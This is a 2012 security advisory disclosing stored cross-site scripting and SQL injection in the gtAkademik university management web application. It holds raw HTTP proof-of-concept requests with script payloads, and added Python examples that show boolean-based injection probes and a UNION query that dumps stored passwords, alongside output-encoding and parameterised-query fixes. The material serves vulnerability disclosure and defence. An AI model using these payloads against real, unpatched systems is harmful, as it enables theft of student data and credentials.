Spentera – Security Advisory – SPN-01-2012

gtAkademik Gamatechno SQL Injection and Persistent Cross Site Scripting Vulnerability

February 20, 2012

Copyright © 2012. Spentera. All rights reserved. http://www.spentera.com Version 1.3


gtAkademik Gamatechno – SQL Injection and Persistent Cross-site Scripting – Security Advisory – SPN-01-2012

Release Date              Monday, February 20, 2012
Last Update               Tuesday, June 19, 2012
Vendor Notification Date  Friday, February 10, 2012
Product                   gtAkademik Gamatechno
Platform                  PHP
Affected Versions         Latest release (2011)
Tested on                 Ubuntu 11.10, Apache 2.2.11, PHP 5.3.9
Risk Factor               High
Impact                    Loss of integrity and confidentiality on server and client side.
Attack Vector             An attacker can retrieve data from the target database and stage a client-side attack using XSS by editing an existing user profile and injecting a JavaScript XSS shell.
Solution Status           Unpatched

Software Description

gtAkademik Academica is a web-based application focused on academic and administrative data management for university students: KRS (course registration) activities, student grading, curriculum and semester management, through to DIKTI reporting. gtAkademik also has features such as an automated reporting system for EPSBED DIKTI, support for curriculum changes, easy management of student transcripts, virtual class (e-learning), online KRS and coaching, and reporting.

Vulnerability Details

Persistent XSS

The application stores user-supplied input in the database without sanitising or encoding it, so an attacker can inject script that is served back to every user who views the stored record (stored XSS). Two modules are affected: the Message module and the Update Profile module.

SQL Injection

The application also suffers from SQL injection, again because input reaches the query without any sanitisation. This allows an attacker to extract the contents of the database and find sensitive data, for example the credentials stored in it.

Proof of Concept

Persistent XSS in Message Module

The Message module provides internal messaging inside gtAkademik. We can send an XSS-crafted message to other users, for example to the administrator user.

POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive


Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==

Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX

Content-Type: application/x-www-form-urlencoded

Content-Length: 169

data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX&data%5BMessageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3E&act=doCompose&compBtn=Kirim
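The following is an added example written for this advisory; it is not code from Spentera or from Gamatechno. It decodes the two stored-XSS PoC bodies on this page (the Message module body above and the User Profile module body shown in the next section), flags the fields that carry markup, and contrasts a template that echoes the stored value with one that HTML-encodes it. The two rendering functions and the triage pattern are assumptions for illustration, not the application's real view code.

```python
"""Decode the two stored-XSS proof-of-concept bodies and show the missing
output encoding.

Added example for advisory SPN-01-2012; not Spentera's or gtAkademik's code.
The request bodies are copied from the advisory's PoCs (placeholder values
kept). The rendering functions are a hypothetical template, not the
application's real view code.
"""
import html
import re
from urllib.parse import parse_qs

# Constructed inputs: the PoC bodies from the Message module and the
# User Profile module requests in this advisory.
MESSAGE_BODY = (
    "data%5BMessageSender%5D=XXXXXXXXXX&data%5BMessageReceiver%5D=XXXXXXXXXX"
    "&data%5BMessageTitle%5D=%3Cscript%3E&data%5BMessageContent%5D=%3Cscript%3E"
    "&act=doCompose&compBtn=Kirim"
)
PROFILE_BODY = (
    "tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX"
    "&alamat=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E"
    "&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu="
    "&simpan=Simpan"
)

# Cheap triage pattern (assumption): a tag opener, a javascript: URL or an
# on*= handler. It is a review aid for already-stored fields, not a filter to
# deploy instead of output encoding.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:|\bon[a-z]+\s*=", re.IGNORECASE)


def decode_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into name -> value.

    parse_qs percent-decodes names as well, so data%5BMessageTitle%5D becomes
    data[MessageTitle]; keep_blank_values keeps empty fields such as nama_ayah=.
    """
    return {name: values[0] for name, values in parse_qs(body, keep_blank_values=True).items()}


def tainted_fields(form: dict) -> list:
    """Names of the fields whose submitted value carries HTML or script markup."""
    return sorted(name for name, value in form.items() if MARKUP_RE.search(value))


def render_unsafe(value: str) -> str:
    """Echo the stored value into the page as-is: the behaviour the advisory reports."""
    return "<td>" + value + "</td>"


def render_safe(value: str) -> str:
    """Encode for an HTML text context before output, so the browser shows the
    payload as text instead of executing it."""
    return "<td>" + html.escape(value, quote=True) + "</td>"


if __name__ == "__main__":
    for label, body in (("message", MESSAGE_BODY), ("profile", PROFILE_BODY)):
        form = decode_form(body)
        for name in tainted_fields(form):
            print(label, name, "unsafe:", render_unsafe(form[name]))
            print(label, name, "safe:  ", render_safe(form[name]))
```

Encoding belongs at output time, in the context the value lands in (an HTML text node here; attribute, URL and JavaScript contexts need their own encoders). That output-side step is what the advisory's "no sanitisation" observation actually points at; rejecting or stripping input on the way into the database is a weaker substitute, and the regex above is only for reviewing data that is already stored.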

Persistent XSS in User Profile Module (save the user profile)

This module is used to update the user profile. We can inject an XSS payload into a profile field and save it to the database, so everyone who views our profile can be attacked with the XSS.

POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1

Host: 1.1.1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=

Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX

Content-Type: application/x-www-form-urlencoded

Content-Length: 213

tanggal=02%2F08%2F1988&alamat_asal=XXXXXXXXXX&alamat=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan

SQL Injection in 'id' parameter

The parameter 'id' is vulnerable to SQL injection; anything appended after the numeric value becomes part of the query.

http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204[INJECTED PARAMETER]
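Added example, not Spentera's or the vendor's code: an in-memory sqlite3 table with constructed rows stands in for the registration data behind the URL above, a lookup that concatenates the id value reproduces the bug the advisory describes, and a parameterised lookup shows the fix. `looks_injectable` runs the boolean-based differential check a tester would use to confirm the finding, and `dump_credentials` shows the UNION-based extraction the advisory's impact statement refers to. The table and column names are assumptions; the real gtAkademik schema is not known, and sqlite3 is only a stand-in for the application's database engine.

```python
"""Boolean-based confirmation and the fix for the injectable id parameter.

Added example for advisory SPN-01-2012, not vendor code. The table, columns
and rows are constructed for illustration (the real gtAkademik schema is not
known) and sqlite3 stands in for the application's database engine. The
advisory itself only shows the URL with [INJECTED PARAMETER] after
id=129000204.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table standing in for the registration data behind
    mod=transaksi_registrasi_pmb (constructed rows, hypothetical names)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pendaftar (id INTEGER PRIMARY KEY, nama TEXT, password TEXT);
        INSERT INTO pendaftar VALUES (129000204, 'Budi', 'rahasia1');
        INSERT INTO pendaftar VALUES (129000205, 'Siti', 'rahasia2');
        INSERT INTO pendaftar VALUES (129000206, 'Andi', 'rahasia3');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """The pattern the advisory describes: the request value is concatenated
    into the statement, so anything after the number becomes SQL."""
    return conn.execute("SELECT id, nama FROM pendaftar WHERE id=" + raw_id).fetchall()


def lookup_fixed(conn: sqlite3.Connection, raw_id: str) -> list:
    """Validate the type the parameter is supposed to have, then bind it.
    Binding alone already prevents injection; the check gives a clean
    failure for non-numeric input instead of a silent empty result."""
    if not raw_id.isdigit():
        raise ValueError("id must be numeric")
    return conn.execute("SELECT id, nama FROM pendaftar WHERE id=?", (int(raw_id),)).fetchall()


def _try(query_fn, conn: sqlite3.Connection, value: str):
    """Run one probe; a rejected or broken query counts as a distinct response."""
    try:
        return query_fn(conn, value)
    except (sqlite3.Error, ValueError):
        return None


def looks_injectable(query_fn, conn: sqlite3.Connection, base_id: str) -> bool:
    """Boolean-based differential test, the first check a tester runs on a
    numeric parameter: appending a true condition must leave the response
    unchanged and appending a false condition must change it."""
    plain = _try(query_fn, conn, base_id)
    with_true = _try(query_fn, conn, base_id + " AND 1=1")
    with_false = _try(query_fn, conn, base_id + " AND 1=2")
    return plain is not None and plain == with_true and with_true != with_false


def dump_credentials(conn: sqlite3.Connection) -> list:
    """What 'extract contents of database' means in practice: a UNION that
    appends every stored credential to the injectable query's result."""
    return lookup_vulnerable(conn, "0 UNION ALL SELECT id, password FROM pendaftar")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup injectable:", looks_injectable(lookup_vulnerable, db, "129000204"))
    print("fixed lookup injectable:     ", looks_injectable(lookup_fixed, db, "129000204"))
    print("all rows via OR 1=1:", lookup_vulnerable(db, "129000204 OR 1=1"))
    print("credentials via UNION:", dump_credentials(db))
```

The differential check is what turns "the parameter looks injectable" into a confirmed finding without pulling data: the `AND 1=1` / `AND 1=2` pair only changes the result if the suffix is being parsed as SQL. On the fixed endpoint the suffix is rejected before it reaches the database, so the check fails, which is the behaviour a retest of a patched build should show.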

Solution

Unpatched

Discovered by

Mada R. Perdhana and Hanny Haliwela from Spentera Research.


About Us

Spentera is a limited liability security consulting company that focuses on penetration testing services, vulnerability discovery, and digital forensics. We have been providing satisfactory service to clients in Indonesia in particular, and the world at large. Our portfolio is proof that we are building this company seriously and pay attention to every aspect of the quality delivered to the client. All services we provide are based on international standards that are used as primary standards in countries such as the United States, Japan, Germany, France, and the United Kingdom.

Some of the clients we handle include military, police, government, mining, oil and gas, and the private sector such as finance and banking.

Our security experts' seven years of experience is beyond doubt. Our good relationship with the client is the most important basis for the quality of service that we continue to improve.

Spentera, Centerflix Boutique Office
Jl. Danau Toba no. 104, Bendungan Hilir
Jakarta Pusat 10210
Jakarta, Indonesia

T: +62 (21) 570 1505  F: +62 (21) 573 8105
W: http://www.spentera.com  E: [email protected]